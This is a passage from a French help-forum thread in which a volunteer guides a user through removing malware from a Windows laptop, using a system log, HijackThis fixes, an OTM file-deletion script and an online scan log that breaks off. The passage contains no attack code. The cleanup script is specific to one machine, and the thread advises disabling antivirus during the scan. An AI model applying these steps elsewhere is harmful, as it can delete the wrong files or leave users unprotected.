"ehTray.exe"=C:\Windows\ehome\ehTray.exe [2008-01-19 125952]
"Skype"=C:\Program Files\Skype\Phone\Skype.exe [2009-06-26 25604904]
"WMPNSCFG"=C:\Program Files\Windows Media Player\WMPNSCFG.exe [2008-01-19 202240]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe [2009-03-05 2260480]
"Sony Ericsson PC Suite"=C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe [2009-11-20 434176]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\32868532]
C:\ProgramData\32868532\32868532.exe []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BitComet]
C:\Program Files\BitComet\BitComet.exe /tray []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Sony Ericsson PC Suite]
C:\Program Files\Sony Ericsson\Mobile2\Application Launcher\Application Launcher.exe /startoptions []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\sysgif32]
C:\Users\maman\AppData\Local\Temp\~TM50A7.tmp []
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
HP Digital Imaging Monitor.lnk - C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
Philips Gestionnaire de périphériques.lnk - C:\Program Files\Philips\SA28XX Device Manager\main.exe
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfPf]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfRd]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfSvc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfUsbccidDriver]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"LogonHoursAction"=2
"DontDisplayLogonHoursWarnings"=1
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"EnableUIADesktopToggle"=0
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=255
"NoDriveAutoRun"=255
"HonorAutoRunSetting"=0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"BindDirectlyToPropertySetStorage"=
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"HonorAutoRunSetting"=
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
======File associations======
.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*
.txt - open - C:\Windows\notepad.exe %1
======List of files/folders created in the last 1 months======
2010-02-20 23:17:36 ----RASHD---- C:\autorun.inf
2010-02-20 23:12:34 ----A---- C:\UsbFix.txt
2010-02-20 23:01:12 ----D---- C:\UsbFix
2010-02-20 20:47:06 ----D---- C:\Users\maman\AppData\Roaming\Malwarebytes
2010-02-20 20:47:01 ----D---- C:\ProgramData\Malwarebytes
2010-02-20 20:46:59 ----D---- C:\Program Files\Malwarebytes' Anti-Malware
2010-02-20 20:26:00 ----D---- C:\Program Files\trend micro
2010-02-20 20:25:59 ----D---- C:\rsit
2010-02-11 13:03:38 ----A---- C:\Windows\system32\tsbyuv.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\quartz.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msyuv.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msvidc32.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msrle32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\msvfw32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\mciavi32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\iyuv_32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\avifil32.dll
2010-02-10 21:14:37 ----D---- C:\ProgramData\BVRP Software
2010-02-10 21:11:04 ----A---- C:\ProgramData\hpeA6B.dll
2010-02-10 21:10:37 ----D---- C:\ProgramData\Sony Ericsson
2010-01-24 14:24:34 ----A---- C:\Windows\system32\aswBoot.exe
2010-01-24 11:31:29 ----A---- C:\Windows\wininit.ini
2010-01-24 11:05:34 ----D---- C:\ProgramData\Spybot - Search & Destroy
2010-01-24 11:05:34 ----D---- C:\Program Files\Spybot - Search & Destroy
2010-01-24 10:39:25 ----A---- C:\Windows\system32\mshtml.dll
2010-01-24 10:39:24 ----A---- C:\Windows\system32\ieframe.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\wininet.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\urlmon.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\iertutil.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\occache.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeedsbs.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeeds.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\jsproxy.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\ieUnatt.exe
2010-01-24 10:39:22 ----A---- C:\Windows\system32\ieui.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iesysprep.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iepeers.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iedkcs32.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\msfeedssync.exe
2010-01-24 10:39:17 ----A---- C:\Windows\system32\iesetup.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\iernonce.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\ie4uinit.exe
2010-01-23 22:39:44 ----D---- C:\ProgramData\Alwil Software
2010-01-23 16:56:16 ----A---- C:\Windows\ntbtlog.txt
2010-01-23 08:39:56 ----D---- C:\Users\maman\AppData\Roaming\HpUpdate
2010-01-23 08:39:53 ----D---- C:\Windows\Hewlett-Packard
======List of files/folders modified in the last 1 months======
2010-02-21 00:59:55 ----D---- C:\Windows\Temp
2010-02-20 23:28:47 ----D---- C:\Windows\Prefetch
2010-02-20 23:18:39 ----D---- C:\Program Files\Mozilla Firefox
2010-02-20 23:16:28 ----SHD---- C:\$RECYCLE.BIN
2010-02-20 23:12:30 ----D---- C:\Windows\SMINST
2010-02-20 22:48:38 ----A---- C:\Windows\NeroDigital.ini
2010-02-20 22:35:27 ----D---- C:\Users\maman\AppData\Roaming\Skype
2010-02-20 22:34:55 ----D---- C:\Users\maman\AppData\Roaming\skypePM
2010-02-20 22:33:27 ----D---- C:\Windows\system32\drivers
2010-02-20 22:33:27 ----D---- C:\Windows\SchCache
2010-02-20 22:31:01 ----HD---- C:\ProgramData
2010-02-20 21:56:54 ----D---- C:\Users\maman\AppData\Roaming\FileZilla
2010-02-20 20:46:59 ----RD---- C:\Program Files
2010-02-20 11:58:32 ----SHD---- C:\System Volume Information
2010-02-20 11:49:06 ----D---- C:\ProgramData\Skyline
2010-02-20 11:35:48 ----SHD---- C:\Windows\Installer
2010-02-20 11:35:43 ----D---- C:\ProgramData\Microsoft Help
2010-02-18 18:32:08 ----D---- C:\Windows
2010-02-16 16:20:22 ----D---- C:\Windows\System32
2010-02-16 16:20:22 ----D---- C:\Windows\inf
2010-02-16 16:20:22 ----A---- C:\Windows\system32\PerfStringBackup.INI
2010-02-13 13:53:55 ----D---- C:\Windows\system32\catroot2
2010-02-11 20:20:35 ----D---- C:\Windows\winsxs
2010-02-11 20:10:25 ----D---- C:\Windows\system32\catroot
2010-02-11 20:06:25 ----D---- C:\Program Files\Windows Mail
2010-02-10 21:10:37 ----HD---- C:\Program Files\InstallShield Installation Information
2010-02-10 21:10:37 ----D---- C:\Program Files\Sony Ericsson
2010-02-01 20:26:20 ----A---- C:\Windows\system32\mrt.exe
2010-01-31 11:48:33 ----D---- C:\Windows\Tasks
2010-01-31 11:48:33 ----D---- C:\Windows\system32\Tasks
2010-01-27 20:51:18 ----D---- C:\Program Files\Internet Explorer
2010-01-24 14:25:00 ----D---- C:\Program Files\Common Files\microsoft shared
2010-01-24 14:00:28 ----D---- C:\Users\maman\AppData\Roaming\Teleca
2010-01-24 14:00:24 ----D---- C:\Windows\Downloaded Installations
2010-01-24 14:00:11 ----D---- C:\Program Files\Common Files\Teleca Shared
2010-01-24 14:00:07 ----D---- C:\Program Files\Common Files
2010-01-24 13:54:46 ----D---- C:\Windows\system32\migration
2010-01-23 22:41:00 ----D---- C:\Program Files\Alwil Software
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr.sys [2010-02-11 23376]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2010-02-11 162512]
R1 aswTdi;avast! Network Shield Support; C:\Windows\system32\drivers\aswTdi.sys [2010-02-11 46672]
R1 eabfiltr;eabfiltr; C:\Windows\system32\DRIVERS\eabfiltr.sys [2006-11-30 8192]
R1 IDSvix86;Symantec Intrusion Prevention Driver; \??\C:\PROGRA~2\Symantec\DEFINI~1\SymcData\idsdefs\20080215.002\IDSvix86.sys [2008-02-13 261680]
R1 kl1;kl1; C:\Windows\system32\DRIVERS\kl1.sys [2007-10-31 110096]
R1 SRTSPX;SRTSPX; C:\Windows\System32\Drivers\SRTSPX.SYS [2007-11-30 43696]
R1 SYMTDI;SYMTDI; C:\Windows\System32\Drivers\SYMTDI.SYS [2007-10-30 191536]
R2 aswFsBlk;aswFsBlk; C:\Windows\system32\drivers\aswFsBlk.sys [2010-02-11 19024]
R2 aswMonFlt;aswMonFlt; \??\C:\Windows\system32\drivers\aswMonFlt.sys [2010-02-11 51792]
R2 mdmxsdk;mdmxsdk; C:\Windows\system32\DRIVERS\mdmxsdk.sys [2006-06-19 12672]
R2 rimmptsk;rimmptsk; C:\Windows\system32\DRIVERS\rimmptsk.sys [2007-02-24 39936]
R2 rimsptsk;rimsptsk; C:\Windows\system32\DRIVERS\rimsptsk.sys [2007-01-23 42496]
R2 rismxdp;Ricoh xD-Picture Card Driver; C:\Windows\system32\DRIVERS\rixdptsk.sys [2007-01-23 37376]
R2 XAudio;XAudio; C:\Windows\system32\DRIVERS\xaudio.sys [2006-11-28 8192]
R3 BCM43XX;Pilote pour carte réseau Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016]
R3 CmBatt;Pilote pour Batterie à méthode de contrôle ACPI Microsoft; C:\Windows\system32\DRIVERS\CmBatt.sys [2008-01-19 14208]
R3 CnxtHdAudService;Conexant UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDRT32.sys [2008-03-03 188416]
R3 HBtnKey;HBtnKey; C:\Windows\system32\DRIVERS\cpqbttn.sys [2006-06-28 9472]
R3 HSF_DPV;HSF_DPV; C:\Windows\system32\DRIVERS\HSX_DPV.sys [2006-12-07 985600]
R3 HSXHWAZL;HSXHWAZL; C:\Windows\system32\DRIVERS\HSXHWAZL.sys [2006-12-07 207360]
R3 NVENETFD;NVIDIA nForce Networking Controller Driver; C:\Windows\system32\DRIVERS\nvmfdx32.sys [2007-03-07 1059112]
R3 nvlddmkm;nvlddmkm; C:\Windows\system32\DRIVERS\nvlddmkm.sys [2007-09-19 7626400]
R3 nvsmu;nvsmu; C:\Windows\system32\DRIVERS\nvsmu.sys [2007-02-17 12032]
R3 sdbus;sdbus; C:\Windows\system32\DRIVERS\sdbus.sys [2009-04-11 89088]
R3 SymEvent;SymEvent; \??\C:\Windows\system32\Drivers\SYMEVENT.SYS [2007-12-22 123952]
R3 SynTP;Synaptics TouchPad Driver; C:\Windows\system32\DRIVERS\SynTP.sys [2007-01-13 181432]
R3 usbvideo;Périphérique vidéo USB (WDM); C:\Windows\System32\Drivers\usbvideo.sys [2008-01-19 134016]
R3 winachsf;winachsf; C:\Windows\system32\DRIVERS\HSX_CNXT.sys [2006-12-07 659968]
R3 WmiAcpi;Microsoft Windows Management Interface for ACPI; C:\Windows\system32\DRIVERS\wmiacpi.sys [2008-01-19 11264]
R3 WUDFRd;WUDFRd; C:\Windows\system32\DRIVERS\WUDFRd.sys [2008-01-19 83328]
S3 BCM43XV;Pilote de la carte réseau extensible Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016]
S3 Dot4;Pilote MS IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4.sys [2008-01-19 131584]
S3 Dot4Print;Pilote de classe Imprimante pour IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4Prt.sys [2008-01-19 16384]
S3 dot4usb;MS Dot4USB Filter Dot4USB Filter; C:\Windows\system32\DRIVERS\dot4usb.sys [2008-01-19 36864]
S3 drmkaud;Filtre de décodeur DRM (Noyau Microsoft); C:\Windows\system32\drivers\drmkaud.sys [2008-01-19 5632]
S3 E100B;Pilote de carte Intel (R) PRO; C:\Windows\system32\DRIVERS\e100b325.sys [2006-11-02 163328]
S3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDART.sys [2007-04-12 160768]
S3 HSFHWAZL;HSFHWAZL; C:\Windows\system32\DRIVERS\VSTAZL3.SYS [2006-11-02 200704]
S3 ialm;ialm; C:\Windows\system32\DRIVERS\igdkmd32.sys [2006-10-19 1380864]
S3 MSKSSRV;Proxy de service de répartition Microsoft; C:\Windows\system32\drivers\MSKSSRV.sys [2008-01-19 8192]
S3 MSPCLOCK;Proxy d'horloge de répartition Microsoft; C:\Windows\system32\drivers\MSPCLOCK.sys [2008-01-19 5888]
S3 MSPQM;Proxy de gestion de qualité de répartition Microsoft; C:\Windows\system32\drivers\MSPQM.sys [2008-01-19 5504]
S3 MSTEE;Convertisseur en T/site-à-site de répartition Microsoft; C:\Windows\system32\drivers\MSTEE.sys [2008-01-19 6016]
S3 NAVENG;NAVENG; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVENG.SYS [2008-01-21 82256]
S3 NAVEX15;NAVEX15; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVEX15.SYS [2008-01-21 895312]
S3 s816bus;Sony Ericsson Device 816 driver (WDM); C:\Windows\system32\DRIVERS\s816bus.sys [2007-06-19 81832]
S3 s816mdfl;Sony Ericsson Device 816 USB WMC Modem Filter; C:\Windows\system32\DRIVERS\s816mdfl.sys [2007-06-19 13864]
S3 s816mdm;Sony Ericsson Device 816 USB WMC Modem Driver; C:\Windows\system32\DRIVERS\s816mdm.sys [2007-06-19 107304]
S3 s816mgmt;Sony Ericsson Device 816 USB WMC Device Management Drivers (WDM); C:\Windows\system32\DRIVERS\s816mgmt.sys [2007-06-19 99112]
S3 s816nd5;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (NDIS); C:\Windows\system32\DRIVERS\s816nd5.sys [2007-06-19 21928]
S3 s816obex;Sony Ericsson Device 816 USB WMC OBEX Interface; C:\Windows\system32\DRIVERS\s816obex.sys [2007-06-19 97320]
S3 s816unic;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (WDM); C:\Windows\system32\DRIVERS\s816unic.sys [2007-06-19 97704]
S3 SRTSP;SRTSP; C:\Windows\System32\Drivers\SRTSP.SYS [2007-11-30 279088]
S3 SRTSPL;SRTSPL; C:\Windows\System32\Drivers\SRTSPL.SYS [2007-11-30 317616]
S3 SYMDNS;SYMDNS; C:\Windows\System32\Drivers\SYMDNS.SYS [2007-10-30 12848]
S3 SYMFW;SYMFW; C:\Windows\System32\Drivers\SYMFW.SYS [2007-10-30 145968]
S3 SYMIDS;SYMIDS; C:\Windows\System32\Drivers\SYMIDS.SYS [2007-10-30 39856]
S3 SYMNDISV;SYMNDISV; C:\Windows\System32\Drivers\SYMNDISV.SYS [2007-10-30 37936]
S3 SYMREDRV;SYMREDRV; C:\Windows\System32\Drivers\SYMREDRV.SYS [2007-10-30 27696]
S3 usb_rndisx;Carte RNDIS USB; C:\Windows\system32\DRIVERS\usb8023x.sys [2009-04-11 15872]
S3 usbscan;Pilote de scanneur USB; C:\Windows\system32\DRIVERS\usbscan.sys [2008-01-19 35328]
S3 WpdUsb;WpdUsb; C:\Windows\system32\DRIVERS\wpdusb.sys [2009-10-01 40448]
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 avast! Antivirus;avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R2 HP Health Check Service;HP Health Check Service; c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe [2008-06-16 94208]
R2 hpqddsvc;Service HP CUE DeviceDiscovery; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 hpqwmiex;hpqwmiex; C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe [2006-05-02 135168]
R2 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [2007-04-19 75304]
R2 Net Driver HPZ12;Net Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504]
R2 OMSI download service;Sony Ericsson OMSI download service; C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe [2009-04-30 90112]
R2 Pml Driver HPZ12;Pml Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504]
R2 RapiMgr;@%windir%\WindowsMobile\rapimgr.dll,-104; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 SBSDWSCService;SBSD Security Center Service; C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe [2009-01-26 1153368]
R2 WcesComm;@%windir%\WindowsMobile\wcescomm.dll,-40079; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 XAudioService;XAudioService; C:\Windows\system32\DRIVERS\xaudio.exe [2006-11-28 386560]
R3 avast! Mail Scanner;avast! Mail Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R3 avast! Web Scanner;avast! Web Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R3 hpqcxs08;hpqcxs08; C:\Windows\system32\svchost.exe [2008-01-19 21504]
S2 SymAppCore;Symantec AppCore Service; c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe []
S3 Com4Qlb;Com4Qlb; C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe [2007-01-09 110592]
S3 FontCache;@%systemroot%\system32\FntCache.dll,-100; C:\Windows\system32\svchost.exe [2008-01-19 21504]
S3 getPlusHelper;@C:\Program Files\NOS\bin\getPlus_Helper.dll,-101; C:\Windows\System32\svchost.exe [2008-01-19 21504]
S3 gusvc;Google Updater Service; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2008-11-20 136120]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728]
S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2008-11-04 441712]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S3 RoxMediaDB9;RoxMediaDB9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe [2007-02-12 880640]
S3 stllssvr;stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [2007-02-17 74656]
S3 usnjsvc;Service Messenger Sharing Folders USN Journal Reader; C:\Program Files\Windows Live\Messenger\usnsvc.exe [2007-10-18 98328]
S4 CLCapSvc;CyberLink Background Capture Service (CBCS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLCapSvc.exe [2007-04-23 262243]
S4 CLSched;CyberLink Task Scheduler (CTS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLSched.exe [2007-04-23 106593]
-----------------EOF----------------- |
|
Posté le 21/02/2010 à 14:53 |
Grande Maîtresse astucienne |
bonjour,
* lance hijackthis "do a system scan only" puis coche ces lignes :
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
O2 - BHO: EoRezoBHO - {64F56FC1-1272-44CD-BA6E-39723696E350} - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE RÉSEAU')
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
* clique sur FIX CHECKED
ensuite
- Télécharge OTM (de Old_Timer) sur ton bureau,
- Double-clique sur OTM.exe pour lancer le programme,
- Copie la liste de fichiers ou de dossiers ci-dessous et colle-la dans la fenêtre du programme "Paste Instructions for Items to be Moved" :
Begin copying here:
:Files
C:\ProgramData\32868532\32868532.exe
c:\program files\eorezo
:Commands
[emptytemp]
[reboot]
-
- Clique sur MoveIt! pour lancer la suppression,
- Le résultat appraraîtra dans le cadre Results.
- Clique sur Exit pour fermer le programme.
- Poste le rapport qui est situé ici : C:\_OTM\MovedFiles
- Il te sera peut-être demandé de redémarrer ton PC. Dans ce cas, clique sur Yes.
* fait un scan avec IE ici :
http://www.kaspersky.com/kos/eng/partner/default/pages/default/check.html?n=1259235770640
* désactive ton antivirus le temps du scan
poste le rapport ensuite
|
|
Posté le 21/02/2010 à 16:41 |
Petite astucienne
| Bonjour,
voici le rapport après scan. Merci.
All processes killed
Error: Unable to interpret <Begin copying here:> in the current context!
========== FILES ==========
File/Folder C:\ProgramData\32868532\32868532.exe not found.
c:\program files\EoRezo\EoAdv\tmp folder moved successfully.
c:\program files\EoRezo\EoAdv folder moved successfully.
c:\program files\EoRezo folder moved successfully.
========== COMMANDS ==========
[EMPTYTEMP]
User: All Users
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
User: Invité
->Temp folder emptied: 12609470 bytes
->Temporary Internet Files folder emptied: 29278246 bytes
->FireFox cache emptied: 14004158 bytes
User: maman
->Temp folder emptied: 1913 bytes
->Temporary Internet Files folder emptied: 82957231 bytes
->Java cache emptied: 522719 bytes
->FireFox cache emptied: 54641016 bytes
->Google Chrome cache emptied: 6053089 bytes
User: postgres
User: postgres0
User: Public
User: tinypgsvc
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 300116 bytes
%systemroot%\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 36386 bytes
RecycleBin emptied: 0 bytes
Total Files Cleaned = 191,00 mb
OTM by OldTimer - Version 3.1.9.0 log created on 02212010_155944
Files moved on Reboot...
File C:\Windows\temp\_avast5_\Webshlock.txt not found!
Registry entries deleted on Reboot... |
|
Posté le 21/02/2010 à 16:45 |
Grande Maîtresse astucienne |
OK
tu peux passer à la suite que j'ai donné tout à l'heure le scan en ligne
@ + tard |
|
Posté le 21/02/2010 à 17:05 |
Petite astucienne
| The program is starting. Please wait...
Updates source is selected: http://www.kaspersky.com
File download: packages/kos-extras.jar
The program is started.
Updating the anti-virus database. Please wait...
Updates source is selected: http://downloads1.kaspersky-labs.com/
File download: index/master.xml.klz
File download: bases/five/avc/kavset.xml.klz
File download: bases/five/avc/kavset.xml.klz
File download: bases/five/avc/fa001.avc
File download: bases/five/avc/basebafc.avc
File download: bases/five/avc/basebb0c.avc
File download: bases/five/avc/basebb1c.avc
File download: bases/five/avc/basebb2c.avc
File download: bases/five/avc/basebb3c.avc
File download: bases/five/avc/basebb4c.avc
File download: bases/five/avc/basebb5c.avc
File download: bases/five/avc/basebb6c.avc
File download: bases/five/avc/basebb7c.avc
File download: bases/five/avc/basebb8c.avc
File download: bases/five/avc/basebb9c.avc
File download: bases/five/avc/basebbac.avc
File download: bases/five/avc/basebbbc.avc
File download: bases/five/avc/basebbcc.avc
File download: bases/five/avc/basebbdc.avc
File download: bases/five/avc/basebbec.avc
File download: bases/five/avc/basebbfc.avc
File download: bases/five/avc/basebc0c.avc
File download: bases/five/avc/basebc1c.avc
File download: bases/five/avc/basebc2c.avc
File download: bases/five/avc/basebc3c.avc
File download: bases/five/avc/basebc4c.avc
File download: bases/five/avc/basebc5c.avc
File download: bases/five/avc/basebc6c.avc
File download: bases/five/avc/basebc7c.avc
File download: bases/five/avc/basebc8c.avc
File download: bases/five/avc/dailyc.avc
File download: bases/five/avc/ext001c.avc
File download: bases/five/avc/ext002c.avc
File download: bases/five/avc/ext003c.avc
File download: bases/five/avc/ext004c.avc
File download: bases/five/avc/ext005c.avc
File download: bases/five/avc/ext006c.avc
File download: bases/five/avc/ext007c.avc
File download: bases/five/avc/ext008c.avc
File download: bases/five/avc/ext009c.avc
File download: bases/five/avc/ext010c.avc
File download: bases/five/avc/ext011c.avc
File download: bases/five/avc/ext012c.avc
File download: bases/five/avc/ext013c.avc
File download: bases/five/avc/ext014c.avc
File download: bases/five/avc/ext015c.avc
File download: bases/five/avc/ext016c.avc
File download: bases/five/avc/ext017c.avc
File download: bases/five/avc/ext018c.avc
File download: bases/five/avc/ext019c.avc
File download: bases/five/avc/ext020c.avc
File download: bases/five/avc/ext021c.avc
File download: bases/five/avc/ext022c.avc
File download: bases/five/avc/ext023c.avc
File download: bases/five/avc/ext024c.avc
File download: bases/five/avc/ext025c.avc
File download: bases/five/avc/ext026c.avc
File download: bases/five/avc/ext027c.avc
File download: bases/five/avc/ext028c.avc
File download: bases/five/avc/ext029c.avc
File download: bases/five/avc/ext030c.avc
File download: bases/five/avc/ext031c.avc
File download: bases/five/avc/ext032c.avc
File download: bases/five/avc/ext033c.avc
File download: bases/five/avc/ext034c.avc
File download: bases/five/avc/ext035c.avc
File download: bases/five/avc/ext036c.avc
File download: bases/five/avc/ext037c.avc
File download: bases/five/avc/ext038c.avc
File download: bases/five/avc/ext039c.avc
File download: bases/five/avc/ext040c.avc
File download: bases/five/avc/ext041c.avc
File download: bases/five/avc/ext042c.avc
File download: bases/five/avc/ext043c.avc
File download: bases/five/avc/ext044c.avc
File download: bases/five/avc/ext045c.avc
File download: bases/five/avc/ext046c.avc
File download: bases/five/avc/ext047c.avc
File download: bases/five/avc/ext048c.avc
File download: bases/five/avc/ext049c.avc
File download: bases/five/avc/ext050c.avc
File download: bases/five/avc/ext051c.avc
File download: bases/five/avc/ext052c.avc
File download: bases/five/avc/ext053c.avc
File download: bases/five/avc/ext054c.avc
File download: bases/five/avc/ext055c.avc
File download: bases/five/avc/ext056c.avc
File download: bases/five/avc/ext057c.avc
File download: bases/five/avc/ext058c.avc
File download: bases/five/avc/ext059c.avc
File download: bases/five/avc/ext060c.avc
File download: bases/five/avc/ext061c.avc
File download: bases/five/avc/ext062c.avc
File download: bases/five/avc/ext063c.avc
File download: bases/five/avc/ext064c.avc
File download: bases/five/avc/ext065c.avc
File download: bases/five/avc/ext066c.avc
File download: bases/five/avc/ext067c.avc
File download: bases/five/avc/ext068c.avc
File download: bases/five/avc/ext069c.avc
File download: bases/five/avc/ext070c.avc
File download: bases/five/avc/ext071c.avc
File download: bases/five/avc/ext072c.avc
File download: bases/five/avc/ext073c.avc
File download: bases/five/avc/ext074c.avc
File download: bases/five/avc/ext075c.avc
File download: bases/five/avc/ext076c.avc
File download: bases/five/avc/ext077c.avc
File download: bases/five/avc/ext078c.avc
File download: bases/five/avc/ext079c.avc
File download: bases/five/avc/ext080c.avc
File download: bases/five/avc/ext081c.avc
